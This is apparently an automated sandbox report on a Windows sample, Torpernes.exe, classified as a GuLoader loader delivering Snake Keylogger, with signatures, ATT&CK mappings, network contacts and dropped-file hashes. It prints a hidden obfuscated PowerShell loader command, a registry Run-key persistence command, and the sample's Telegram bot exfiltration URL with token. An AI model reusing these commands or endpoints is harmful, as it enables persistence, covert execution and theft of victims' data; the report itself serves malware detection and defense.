Windows
Analysis Report
Torpernes.exe
Overview
General Information
Detection

Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Classification
- System is w10x64
- Torpernes.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\Torpernes.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3)
- powershell.exe (PID: 7440 cmdline: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Contentious.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\Contentious.exe" MD5: ECC4FF0EE7D123F0E90587EA3A7B9AE3)
- cmd.exe (PID: 8012 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- reg.exe (PID: 8060 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | |
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | |
{"C2 url": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendMessage?chat_id=5811709821"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | |
| | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype |
---|---|---|---|---|---|
2024-07-25T09:56:55.795858+0200 | 2803305 | 49746 | 443 | TCP | Unknown Traffic |
2024-07-25T09:56:44.263078+0200 | 2803274 | 49737 | 80 | TCP | Potentially Bad Traffic |
2024-07-25T09:57:07.855040+0200 | 2853006 | 49753 | 443 | TCP | A Network Trojan was detected |
2024-07-25T09:56:49.886487+0200 | 2803274 | 49740 | 80 | TCP | Potentially Bad Traffic |
2024-07-25T09:56:51.785131+0200 | 2022930 | 443 | 49742 | TCP | A Network Trojan was detected |
2024-07-25T09:56:47.794238+0200 | 2803305 | 49739 | 443 | TCP | Unknown Traffic |
2024-07-25T09:56:47.325602+0200 | 2803274 | 49737 | 80 | TCP | Potentially Bad Traffic |
2024-07-25T09:56:12.458951+0200 | 2022930 | 443 | 49730 | TCP | A Network Trojan was detected |
2024-07-25T09:56:41.888830+0200 | 2803270 | 49736 | 443 | TCP | Potentially Bad Traffic |
2024-07-25T09:56:53.587006+0200 | 2803305 | 49744 | 443 | TCP | Unknown Traffic |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Code function: | 6_2_238291E0 | |
Source: | Code function: | 6_2_23829941 |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: |
Source: | Code function: | 0_2_0040615C | |
Source: | Code function: | 0_2_004056A1 | |
Source: | Code function: | 0_2_00402770 | |
Source: | Code function: | 6_2_0040615C | |
Source: | Code function: | 6_2_00402770 | |
Source: | Code function: | 6_2_004056A1 |
Source: | File opened: |
Source: | Code function: | 6_2_0015F778 | |
Source: | Code function: | 6_2_0015E005 | |
Source: | Code function: | 6_2_0015E431 | |
Source: | Code function: | 6_2_0015E431 | |
Source: | Code function: | 6_2_0015D7F0 | |
Source: | Code function: | 6_2_0015DE23 | |
Source: | Code function: | 6_2_20CB11C0 | |
Source: | Code function: | 6_2_20CB0D60 | |
Source: | Code function: | 6_2_20CBF8D8 | |
Source: | Code function: | 6_2_20CBF480 | |
Source: | Code function: | 6_2_20CB04A0 | |
Source: | Code function: | 6_2_20CBC4B8 | |
Source: | Code function: | 6_2_20CB0040 | |
Source: | Code function: | 6_2_20CBC060 | |
Source: | Code function: | 6_2_20CBBC08 | |
Source: | Code function: | 6_2_20CBF028 | |
Source: | Code function: | 6_2_20CBD1C0 | |
Source: | Code function: | 6_2_20CB11B0 | |
Source: | Code function: | 6_2_20CBCD68 | |
Source: | Code function: | 6_2_20CB0900 | |
Source: | Code function: | 6_2_20CB1506 | |
Source: | Code function: | 6_2_20CBC910 | |
Source: | Code function: | 6_2_20CBDEC8 | |
Source: | Code function: | 6_2_20CBDA70 | |
Source: | Code function: | 6_2_20CBD618 | |
Source: | Code function: | 6_2_20CBEBD0 | |
Source: | Code function: | 6_2_20CBB7B0 | |
Source: | Code function: | 6_2_20CBB358 | |
Source: | Code function: | 6_2_20CBE778 | |
Source: | Code function: | 6_2_20CBAF00 | |
Source: | Code function: | 6_2_20CBE320 | |
Source: | Code function: | 6_2_238285B0 | |
Source: | Code function: | 6_2_23820498 | |
Source: | Code function: | 6_2_23826FF8 | |
Source: | Code function: | 6_2_23826720 | |
Source: | Code function: | 6_2_23823350 | |
Source: | Code function: | 6_2_23823360 | |
Source: | Code function: | 6_2_23826B78 | |
Source: | Code function: | 6_2_238262C8 | |
Source: | Code function: | 6_2_23825A18 | |
Source: | Code function: | 6_2_23825E70 | |
Source: | Code function: | 6_2_238255C0 | |
Source: | Code function: | 6_2_23827D00 | |
Source: | Code function: | 6_2_23825140 | |
Source: | Code function: | 6_2_23828158 | |
Source: | Code function: | 6_2_238278A8 | |
Source: | Code function: | 6_2_238208F0 | |
Source: | Code function: | 6_2_23820040 | |
Source: | Code function: | 6_2_23827450 |
Networking |
---|
Source: | DNS query: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS query: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00405200 |
System Summary |
---|
Source: | File created: |
Source: | Code function: | 0_2_004031FF | |
Source: | Code function: | 6_2_004031FF |
Source: | File created: |
Source: | Code function: | 0_2_0040646E | |
Source: | Code function: | 0_2_00404A3D | |
Source: | Code function: | 1_2_0457EAD8 | |
Source: | Code function: | 1_2_0457F3A8 | |
Source: | Code function: | 1_2_0457E790 | |
Source: | Code function: | 6_2_0040646E | |
Source: | Code function: | 6_2_00404A3D | |
Source: | Code function: | 6_2_00156108 | |
Source: | Code function: | 6_2_0015C190 | |
Source: | Code function: | 6_2_0015B328 | |
Source: | Code function: | 6_2_0015C473 | |
Source: | Code function: | 6_2_00156730 | |
Source: | Code function: | 6_2_0015C754 | |
Source: | Code function: | 6_2_0015F778 | |
Source: | Code function: | 6_2_00159858 | |
Source: | Code function: | 6_2_0015CA34 | |
Source: | Code function: | 6_2_00154AD9 | |
Source: | Code function: | 6_2_0015BBBA | |
Source: | Code function: | 6_2_0015BEB7 | |
Source: | Code function: | 6_2_0015E431 | |
Source: | Code function: | 6_2_00153578 | |
Source: | Code function: | 6_2_0015D7F0 | |
Source: | Code function: | 6_2_0015D7E0 | |
Source: | Code function: | 6_2_2042B0E0 | |
Source: | Code function: | 6_2_2042C3EC | |
Source: | Code function: | 6_2_20514F11 | |
Source: | Code function: | 6_2_20CB7588 | |
Source: | Code function: | 6_2_20CB0D60 | |
Source: | Code function: | 6_2_20CB3288 | |
Source: | Code function: | 6_2_20CBF8C9 | |
Source: | Code function: | 6_2_20CBF8D8 | |
Source: | Code function: | 6_2_20CB08F0 | |
Source: | Code function: | 6_2_20CBF480 | |
Source: | Code function: | 6_2_20CB0491 | |
Source: | Code function: | 6_2_20CBC4A8 | |
Source: | Code function: | 6_2_20CB04A0 | |
Source: | Code function: | 6_2_20CBC4B8 | |
Source: | Code function: | 6_2_20CB0040 | |
Source: | Code function: | 6_2_20CBC050 | |
Source: | Code function: | 6_2_20CBC060 | |
Source: | Code function: | 6_2_20CBF471 | |
Source: | Code function: | 6_2_20CBBC08 | |
Source: | Code function: | 6_2_20CBF018 | |
Source: | Code function: | 6_2_20CBF028 | |
Source: | Code function: | 6_2_20CB0023 | |
Source: | Code function: | 6_2_20CBD1C0 | |
Source: | Code function: | 6_2_20CB6DF7 | |
Source: | Code function: | 6_2_20CBD1B0 | |
Source: | Code function: | 6_2_20CBCD58 | |
Source: | Code function: | 6_2_20CB0D50 | |
Source: | Code function: | 6_2_20CBCD68 | |
Source: | Code function: | 6_2_20CBC901 | |
Source: | Code function: | 6_2_20CB0900 | |
Source: | Code function: | 6_2_20CBC910 | |
Source: | Code function: | 6_2_20CB4924 | |
Source: | Code function: | 6_2_20CBDEC8 | |
Source: | Code function: | 6_2_20CBAEEF | |
Source: | Code function: | 6_2_20CB3284 | |
Source: | Code function: | 6_2_20CBDEB8 | |
Source: | Code function: | 6_2_20CBDA61 | |
Source: | Code function: | 6_2_20CB7E78 | |
Source: | Code function: | 6_2_20CBDA70 | |
Source: | Code function: | 6_2_20CBD609 | |
Source: | Code function: | 6_2_20CB6E00 | |
Source: | Code function: | 6_2_20CBD618 | |
Source: | Code function: | 6_2_20CBEBC1 | |
Source: | Code function: | 6_2_20CBEBD0 | |
Source: | Code function: | 6_2_20CBBBF8 | |
Source: | Code function: | 6_2_20CB77A8 | |
Source: | Code function: | 6_2_20CBB7A0 | |
Source: | Code function: | 6_2_20CBB7B0 | |
Source: | Code function: | 6_2_20CBB348 | |
Source: | Code function: | 6_2_20CBB358 | |
Source: | Code function: | 6_2_20CBE768 | |
Source: | Code function: | 6_2_20CBE778 | |
Source: | Code function: | 6_2_20CBAF00 | |
Source: | Code function: | 6_2_20CBE310 | |
Source: | Code function: | 6_2_20CBE320 | |
Source: | Code function: | 6_2_23829FB0 | |
Source: | Code function: | 6_2_2382CBD0 | |
Source: | Code function: | 6_2_23828B00 | |
Source: | Code function: | 6_2_2382BF30 | |
Source: | Code function: | 6_2_2382B290 | |
Source: | Code function: | 6_2_238236D8 | |
Source: | Code function: | 6_2_2382A600 | |
Source: | Code function: | 6_2_2382D218 | |
Source: | Code function: | 6_2_2382DA48 | |
Source: | Code function: | 6_2_2382C580 | |
Source: | Code function: | 6_2_238285B0 | |
Source: | Code function: | 6_2_23820D48 | |
Source: | Code function: | 6_2_23820498 | |
Source: | Code function: | 6_2_2382B8E0 | |
Source: | Code function: | 6_2_2382AC48 | |
Source: | Code function: | 6_2_23829FA0 | |
Source: | Code function: | 6_2_2382CBC0 | |
Source: | Code function: | 6_2_238243D8 | |
Source: | Code function: | 6_2_23826FE8 | |
Source: | Code function: | 6_2_23826FF8 | |
Source: | Code function: | 6_2_23826713 | |
Source: | Code function: | 6_2_23826720 | |
Source: | Code function: | 6_2_2382BF20 | |
Source: | Code function: | 6_2_23823350 | |
Source: | Code function: | 6_2_23823360 | |
Source: | Code function: | 6_2_23826B69 | |
Source: | Code function: | 6_2_23826B78 | |
Source: | Code function: | 6_2_2382B281 | |
Source: | Code function: | 6_2_238262B8 | |
Source: | Code function: | 6_2_238262C8 | |
Source: | Code function: | 6_2_2382D20A | |
Source: | Code function: | 6_2_23825A08 | |
Source: | Code function: | 6_2_23825A18 | |
Source: | Code function: | 6_2_23825E60 | |
Source: | Code function: | 6_2_23825E70 | |
Source: | Code function: | 6_2_238285A0 | |
Source: | Code function: | 6_2_238255B1 | |
Source: | Code function: | 6_2_238255C0 | |
Source: | Code function: | 6_2_2382A5F0 | |
Source: | Code function: | 6_2_23827D00 | |
Source: | Code function: | 6_2_23825138 | |
Source: | Code function: | 6_2_23825140 | |
Source: | Code function: | 6_2_23828148 | |
Source: | Code function: | 6_2_23828158 | |
Source: | Code function: | 6_2_2382C570 | |
Source: | Code function: | 6_2_23820488 | |
Source: | Code function: | 6_2_23827898 | |
Source: | Code function: | 6_2_238278A8 | |
Source: | Code function: | 6_2_2382B8D0 | |
Source: | Code function: | 6_2_238208E1 | |
Source: | Code function: | 6_2_238208F0 | |
Source: | Code function: | 6_2_23827CF0 | |
Source: | Code function: | 6_2_23820007 | |
Source: | Code function: | 6_2_2382AC37 | |
Source: | Code function: | 6_2_2382743F | |
Source: | Code function: | 6_2_23820040 | |
Source: | Code function: | 6_2_23822848 | |
Source: | Code function: | 6_2_23827450 | |
Source: | Code function: | 6_2_23822858 |
Source: | Static PE information: |
Source: | Process created: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044C2 |
Source: | Code function: | 0_2_0040206A |
Source: | File created: |
Source: | Mutant created: |
Source: | File created: |
Source: | Static PE information: |
Source: | WMI Queries: |
Source: | File read: |
Source: | Key opened: |
Source: | Binary or memory string: |
Source: | File read: |
Source: | Process created: |
Source: | Section loaded: |
Source: | Key value queried: |
Source: | Window detected: |
Source: | File opened: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: |
Source: | Process created: |
Source: | Code function: | 0_2_00406183 |
Source: | Code function: | 6_3_001949CD | |
Source: | Code function: | 6_2_20CB2891 | |
Source: | Code function: | 6_2_20CB69B2 | |
Source: | Code function: | 6_2_20CB6AC6 | |
Source: | Code function: | 6_2_20CB6AEE | |
Source: | Code function: | 6_2_20CB6A8A | |
Source: | Code function: | 6_2_20CB6A92 | |
Source: | Code function: | 6_2_20CB6A8E | |
Source: | Code function: | 6_2_20CB6A9E | |
Source: | Code function: | 6_2_20CB6A9A | |
Source: | Code function: | 6_2_20CB6AA2 | |
Source: | Code function: | 6_2_20CB6A6A | |
Source: | Code function: | 6_2_20CB1FC2 | |
Source: | Code function: | 6_2_20CB2F01 |
Source: | File created: |
Source: | Registry value created or modified: |
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | API/Special instruction interceptor: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior |
Source: | Last function: |
Source: | Code function: | 0_2_0040615C | |
Source: | Code function: | 0_2_004056A1 | |
Source: | Code function: | 0_2_00402770 | |
Source: | Code function: | 6_2_0040615C | |
Source: | Code function: | 6_2_00402770 | |
Source: | Code function: | 6_2_004056A1 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | API call chain: | graph_0-3507 | ||
Source: | API call chain: | graph_0-3506 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 6_2_00403B4F |
Source: | Code function: | 0_2_00406183 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 0_2_00405E3B |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File opened: | Jump to behavior | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 111 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 115 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Software Packing | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
domzeleni.kz | 185.98.5.168 | true | false | unknown | |
reallyfreegeoip.org | 188.114.96.3 | true | true | unknown | |
api.telegram.org | 149.154.167.220 | true | true | unknown | |
checkip.dyndns.com | 158.101.44.242 | true | false | unknown | |
checkip.dyndns.org | unknown | unknown | true | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true | |
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true | |
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
185.98.5.168 | domzeleni.kz | Kazakhstan | 200532 | HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhs | false |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1481480 |
Start date and time: | 2024-07-25 09:55:01 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Torpernes.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@11/11@4/4 |
EGA Information: |
HCA Information: |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: Torpernes.exe
Time | Type | Description |
---|---|---|
03:55:55 | API Interceptor | |
03:56:45 | API Interceptor | |
08:56:38 | Autostart | |
08:56:46 | Autostart |
Match | Detection | Threat Name |
---|---|---|
149.154.167.220 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Unknown |
 | malicious | Snake Keylogger |
 | malicious | DarkCloud, PureLog Stealer |
 | malicious | AgentTesla, RedLine |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | AgentTesla |
188.114.96.3 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Remcos |
 | malicious | Remcos |
 | malicious | Remcos, DBatLoader |
 | malicious | Unknown |
 | malicious | FormBook |
 | malicious | Unknown |
 | malicious | Unknown |
158.101.44.242 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | Snake Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | Snake Keylogger |
Match | Detection | Threat Name |
---|---|---|
reallyfreegeoip.org | malicious | Snake Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger |
checkip.dyndns.com | malicious | Snake Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
domzeleni.kz | malicious | GuLoader, Snake Keylogger |
 | malicious | GuLoader, Snake Keylogger |
api.telegram.org | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Unknown |
 | malicious | Snake Keylogger |
 | malicious | DarkCloud, PureLog Stealer |
 | malicious | AgentTesla, RedLine |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | AgentTesla |
Match | Detection | Threat Name |
---|---|---|
TELEGRAMRU | malicious | Hancitor, Vidar |
 | malicious | PureLog Stealer, Vidar |
 | malicious | PureLog Stealer, Vidar |
 | malicious | Vidar |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Bdaejec, Vidar |
CLOUDFLARENETUS | malicious | LummaC |
 | malicious | Snake Keylogger |
 | malicious | Unknown |
 | malicious | AgentTesla |
 | malicious | AgentTesla |
 | malicious | CryptOne, Qbot |
 | malicious | Raccoon |
 | malicious | Unknown |
 | malicious | Raccoon |
 | malicious | Unknown |
ORACLE-BMC-31898US | malicious | Unknown |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | Bdaejec |
 | malicious | Snake Keylogger |
 | malicious | GuLoader, Snake Keylogger |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
Match | Detection | Threat Name |
---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | malicious | Snake Keylogger |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | PureLog Stealer |
 | malicious | Snake Keylogger, VIP Keylogger |
 | malicious | Lokibot |
 | malicious | Snake Keylogger |
 | malicious | Snake Keylogger |
 | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | malicious | Snake Keylogger, VIP Keylogger |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla |
 | malicious | AgentTesla |
 | malicious | AgentTesla |
 | malicious | Quasar |
 | malicious | Unknown |
 | malicious | AteraAgent |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | Blank Grabber, Umbral Stealer |
 | malicious | PureLog Stealer |
37f463bf4616ecd445d4a1937da06e19 | malicious | Bdaejec, DarkSide |
 | malicious | CryptOne, Qbot |
 | malicious | Upatre |
 | malicious | Hancitor, Vidar |
 | malicious | Unknown |
 | malicious | Unknown |
 | malicious | PureLog Stealer, Vidar |
 | malicious | PureLog Stealer, Vidar |
 | malicious | Unknown |
 | malicious | Vidar |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.840877972214509 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J |
MD5: | 106D01F562D751E62B702803895E93E0 |
SHA1: | CBF19C2392BDFA8C2209F8534616CCA08EE01A92 |
SHA-256: | 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D |
SHA-512: | 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1283968 |
Entropy (8bit): | 7.384565087462512 |
Encrypted: | false |
SSDEEP: | 24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+ |
MD5: | ECC4FF0EE7D123F0E90587EA3A7B9AE3 |
SHA1: | 70E6F747F9BAE57619817BEB11F836FA8A873726 |
SHA-256: | 1E0A46FD7B7B0706D4D5918BA666ABDCCCC67BE4BE89874B5CB2CA9EA8B12A83 |
SHA-512: | 28F1D457D0A8556CF0BD62FC33556B22D3307E0527A25D451877BCAA9B76B1595D5170E5A221491007D2E8CA5E3A5F384C556F40830576DC942AA0252DBE8A71 |
Malicious: | true |
Antivirus: |
Reputation: | low |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
